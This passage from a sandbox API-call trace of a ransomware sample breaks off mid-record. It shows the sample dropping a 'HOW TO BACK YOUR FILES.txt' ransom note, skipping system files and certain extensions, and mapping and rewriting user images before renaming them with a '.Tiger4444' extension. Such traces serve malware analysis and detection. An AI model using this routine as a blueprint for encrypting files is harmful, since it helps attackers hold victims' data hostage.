out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Searches\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\searches\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.452] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.452] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.452] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.452] CloseHandle (hObject=0x260) returned 1 [0045.452] CloseHandle (hObject=0x2ac) returned 1 [0045.453] GetCurrentThreadId () returned 0xfa8 [0045.453] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0045.453] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Saved Games", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0045.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73208 | out: hHeap=0xc50000) returned 1 [0045.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0045.453] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Saved Games" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0045.453] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games\\") returned="C:\\Users\\FD1HVy\\Saved Games\\" [0045.453] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Saved Games\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3" [0045.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\saved games\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.454] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.471] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.474] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.475] CloseHandle (hObject=0x2ac) returned 1 [0045.475] lstrlenW (lpString="C:\\Users\\FD1HVy\\Saved Games") returned 27 [0045.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x801ce15b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f48 [0045.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.475] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.475] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.476] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.476] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x801ce15b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.476] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.476] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.476] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.476] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.476] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.476] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x801ce15b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x801ce15b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x801f465d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.476] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.476] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.476] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.476] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.476] lstrcpyW (in: lpString1=0x30aeae0, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\desktop.ini", dwFileAttributes=0x22) returned 1 [0045.476] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\desktop.ini", dwFileAttributes=0x6) returned 1 [0045.477] lstrlenW (lpString="desktop.ini") returned 11 [0045.477] lstrlenW (lpString="Tiger4444") returned 9 [0045.477] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.477] lstrlenW (lpString=".dll") returned 4 [0045.477] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.477] lstrlenW (lpString=".lnk") returned 4 [0045.477] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.477] lstrlenW (lpString=".ini") returned 4 [0045.477] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.477] FindNextFileW (in: hFindFile=0xc72f48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.477] FindClose (in: hFindFile=0xc72f48 | out: hFindFile=0xc72f48) returned 1 [0045.477] lstrcpyW (in: lpString1=0x30aeae0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.477] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Saved Games\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\saved games\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.479] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.479] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.479] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.480] CloseHandle (hObject=0x260) returned 1 [0045.480] CloseHandle (hObject=0x2ac) returned 1 [0045.480] GetCurrentThreadId () returned 0xfa8 [0045.480] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0045.480] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0045.480] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f08 | out: hHeap=0xc50000) returned 1 [0045.480] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0045.480] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Pictures" | out: lpString1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0045.481] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0045.481] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3" [0045.481] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.481] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.484] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.485] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.485] CloseHandle (hObject=0x2ac) returned 1 [0045.485] lstrlenW (lpString="C:\\Users\\FD1HVy\\Pictures") returned 24 [0045.485] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.486] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68756327, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8021a7a2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.486] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.486] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.486] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.486] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x68756327, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8021a7a2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.486] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.486] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.486] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.486] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.486] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.486] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8021a7a2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8021a7a2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8021a7a2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.486] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.486] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.486] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafb70330, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0x239e1860, ftLastAccessTime.dwHighDateTime=0x1d4cb51, ftLastWriteTime.dwLowDateTime=0x239e1860, ftLastWriteTime.dwHighDateTime=0x1d4cb51, nFileSizeHigh=0x0, nFileSizeLow=0x634f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0P3NBwM7Yaa5LdwVnoJJ.png", cAlternateFileName="0P3NBW~1.PNG")) returned 1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="Tiger4444.exe") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2=".") returned 1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="..") returned 1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="windows") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="bootmgr") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="pagefile.sys") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="boot") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="ids.txt") returned -1 [0045.486] lstrcmpiW (lpString1="0P3NBwM7Yaa5LdwVnoJJ.png", lpString2="NTUSER.DAT") returned -1 [0045.486] lstrcpyW (in: lpString1=0x30aeada, lpString2="0P3NBwM7Yaa5LdwVnoJJ.png" | out: lpString1="0P3NBwM7Yaa5LdwVnoJJ.png") returned="0P3NBwM7Yaa5LdwVnoJJ.png" [0045.486] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0P3NBwM7Yaa5LdwVnoJJ.png", dwFileAttributes=0x0) returned 1 [0045.487] lstrlenW (lpString="0P3NBwM7Yaa5LdwVnoJJ.png") returned 24 [0045.487] lstrlenW (lpString="Tiger4444") returned 9 [0045.487] lstrcmpiW (lpString1="VnoJJ.png", lpString2="Tiger4444") returned 1 [0045.487] lstrlenW (lpString=".dll") returned 4 [0045.487] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0045.487] lstrlenW (lpString=".lnk") returned 4 [0045.487] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0045.487] lstrlenW (lpString=".ini") returned 4 [0045.487] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0045.487] lstrlenW (lpString=".sys") returned 4 [0045.487] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0045.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0P3NBwM7Yaa5LdwVnoJJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\0p3nbwm7yaa5ldwvnojj.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.487] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.487] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13694022607) returned 1 [0045.487] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=25423) returned 1 [0045.487] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0045.487] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0045.487] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6650, lpName=0x0) returned 0x2c8 [0045.487] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6650) returned 0xbe0000 [0045.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.488] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.488] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.489] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.489] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.489] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.489] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13694171584) returned 1 [0045.489] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0045.489] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0045.489] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.489] CloseHandle (hObject=0x2c8) returned 1 [0045.489] CloseHandle (hObject=0x260) returned 1 [0045.491] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\0P3NBwM7Yaa5LdwVnoJJ.png.Tiger4444") returned 59 [0045.491] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\0P3NBwM7Yaa5LdwVnoJJ.png" (normalized: "c:\\users\\fd1hvy\\pictures\\0p3nbwm7yaa5ldwvnojj.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\0P3NBwM7Yaa5LdwVnoJJ.png.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\0p3nbwm7yaa5ldwvnojj.png.tiger4444"), dwFlags=0x1) returned 1 [0045.491] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=25424 | out: Addend=0xc6f980) returned 16620272 [0045.491] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4476 [0045.491] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x393e63c0, ftCreationTime.dwHighDateTime=0x1d4c5f0, ftLastAccessTime.dwLowDateTime=0xbb375fe0, ftLastAccessTime.dwHighDateTime=0x1d4cc52, ftLastWriteTime.dwLowDateTime=0xbb375fe0, ftLastWriteTime.dwHighDateTime=0x1d4cc52, nFileSizeHigh=0x0, nFileSizeLow=0x11327, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3WV0Ls jiLUSjUUco.gif", cAlternateFileName="3WV0LS~1.GIF")) returned 1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="Tiger4444.exe") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2=".") returned 1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="..") returned 1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="windows") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="bootmgr") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="pagefile.sys") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="boot") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="ids.txt") returned -1 [0045.491] lstrcmpiW (lpString1="3WV0Ls jiLUSjUUco.gif", lpString2="NTUSER.DAT") returned -1 [0045.491] lstrcpyW (in: lpString1=0x30aeada, lpString2="3WV0Ls jiLUSjUUco.gif" | out: lpString1="3WV0Ls jiLUSjUUco.gif") returned="3WV0Ls jiLUSjUUco.gif" [0045.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\3WV0Ls jiLUSjUUco.gif", dwFileAttributes=0x0) returned 1 [0045.492] lstrlenW (lpString="3WV0Ls jiLUSjUUco.gif") returned 21 [0045.492] lstrlenW (lpString="Tiger4444") returned 9 [0045.492] lstrcmpiW (lpString1="jUUco.gif", lpString2="Tiger4444") returned -1 [0045.492] lstrlenW (lpString=".dll") returned 4 [0045.492] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.492] lstrlenW (lpString=".lnk") returned 4 [0045.492] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.492] lstrlenW (lpString=".ini") returned 4 [0045.492] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.492] lstrlenW (lpString=".sys") returned 4 [0045.492] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.492] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\3WV0Ls jiLUSjUUco.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\3wv0ls jilusjuuco.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.492] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.492] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13694532125) returned 1 [0045.492] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=70439) returned 1 [0045.492] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.492] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.492] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11630, lpName=0x0) returned 0x2c8 [0045.492] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11630) returned 0xbe0000 [0045.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.494] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0045.494] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13694743364) returned 1 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.494] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.494] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.495] CloseHandle (hObject=0x2c8) returned 1 [0045.495] CloseHandle (hObject=0x260) returned 1 [0045.498] wsprintfW (in: param_1=0x30ac238, 